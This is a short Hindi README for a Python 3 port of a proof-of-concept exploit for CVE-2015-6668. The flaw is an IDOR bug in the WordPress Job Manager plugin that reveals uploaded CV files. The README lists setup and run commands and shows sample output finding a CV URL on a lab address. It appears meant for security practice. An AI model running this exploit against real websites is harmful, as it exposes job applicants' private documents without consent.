
CVE-2015-6668 के लिए Evangelos Mourikis का POC, जिसे Python 3 के लिए रूपांतरित किया गया है
Evangelos Mourikis द्वारा CVE-2015-6668 के लिए POC, Python 3 के लिए रूपांतरित
Wordpress के Job Manager प्लगइन में IDOR भेद्यता का शोषण करता है।
Python 3.11.9 पर परीक्षण किया गया
रिपो को क्लोन करें, वर्चुअल एनवायरनमेंट सेट करें (यदि चाहें), requests इंस्टॉल करें, और स्क्रिप्ट को Python 3 के साथ चलाएँ।
git clone https://github.com/jimdiroffii/CVE-2015-6668.git
cd CVE-2015-6668
python3 -m venv .venv
source .venv/bin/activate
.\.venv\Scripts\activate
requests इंस्टॉल करेंpython3 -m pip install requests
exploit.py चलाएँpython3 ./exploit.py
$ python3 ./exploit.py
CVE-2015-6668
Title: CV filename disclosure on Job-Manager WP Plugin
Author: Evangelos Mourikis
Blog: https://vagmour.eu
Plugin URL: http://www.wp-jobmanager.com
Versions: <=0.7.25
Enter a vulnerable website: http://10.10.10.10
Enter a file name: HackerAccessGranted
[+] URL of CV found! http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg